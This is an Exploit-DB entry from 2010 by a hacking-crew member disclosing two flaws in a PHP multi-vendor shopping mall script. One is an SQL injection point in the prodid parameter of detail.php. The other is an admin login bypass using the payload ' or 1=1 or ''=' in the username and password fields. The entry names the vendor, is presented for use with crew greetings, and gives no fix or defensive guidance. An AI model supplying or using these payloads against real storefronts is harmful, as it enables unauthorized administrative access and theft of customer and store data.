Pre Multi-Vendor Shopping Malls SQL Injection Vulnerability & Auth Bypass Vulnerabilty

2010-07-06T00:00:00
ID EDB-ID:14245
Type exploitdb
Reporter **RoAd_KiLlEr**
Modified 2010-07-06T00:00:00

Description

Pre Multi-Vendor Shopping Malls SQL Injection Vulnerability & Auth Bypass Vulnerabilty.. Webapps exploit for php platform

                                        
                                            ---------------------------------------------------------------------------
[+]Title               Multi-Vendor Shopping Malls   SQL Injection Vulnerability
[+]Author          **RoAd_KiLlEr**
[+]Contact        RoAd_KiLlEr[at]Khg-Crew[dot]Ws
[+]Tested on     Win Xp Sp 2/3
---------------------------------------------------------------------------
[~] Founded by **RoAd_KiLlEr**
[~] Team: Albanian Hacking Crew
[~] Contact: RoAd_KiLlEr[at]Khg-Crew[dot]Ws 
[~] Home: http://inj3ct0r.com    
[~] Vendor: http://www.hostnomi.com/scripts.php
==========ExPl0iT3d by **RoAd_KiLlEr**==========

[+]Description:
A complete application for Multi-Vendor Shopping Malls with online built-in order placement and processing system, Buying and Selling options, Submit your bulk requirements. Unlimited Store owners can add their stores and products to this system to sale and market their products on single platform. Website owner can add unlimited categories and sub-categories to this E-Commerce system. Store owners have private control panel and order management system. Highly advance new design features with easy template customizations. Major payment gateways included with complete control from admin section. Highly secure customer and store own registrations. Search product by your choice and favorite Store. The world best Multi-Vendor E-Commerce online solution.
=========================================

[+] Dork: No Script Kidies Here :)

==========================================


[+].  SQL-i Vulnerability
=+=+=+=+=+=+=+=+=+

[PoC]:  http://127.0.0.1/path/detail.php?prodid=[SQL-Injection] 


 
 [+].  Auth Bypass Vulnerability
=+=+=+=+=+=+=+=+=+=+


Demo:http://127.0.0.1/path/SiteAdmin/loginform.php

Use ' or 1=1 or ''=' in username and password 



===========================================================================================
[!] Albanian Hacking Crew           
===========================================================================================
[!] **RoAd_KiLlEr**   
===========================================================================================
[!] MaiL: sukihack[at]gmail[dot]com
===========================================================================================
[!] Greetz To : Ton![w]indowS | X-n3t | b4cKd00r ~ | DarKHackeR. | The|DennY` | EaglE EyE | Lekosta | KHG | THE_1NV1S1BL3 & All Albanian/Kosova Hackers 
===========================================================================================
[!] Spec Th4nks: Inj3ct0r.com & r0073r  | indoushka from Dz-Ghost Team  | MaFFiTeRRoR | Sid3^effects | The_Exploited | And All My Friendz
===========================================================================================
[!] Red n'black i dress eagle on my chest
It's good to be an ALBANIAN
Keep my head up high for that flag I die
Im proud to be an ALBANIAN
===========================================================================================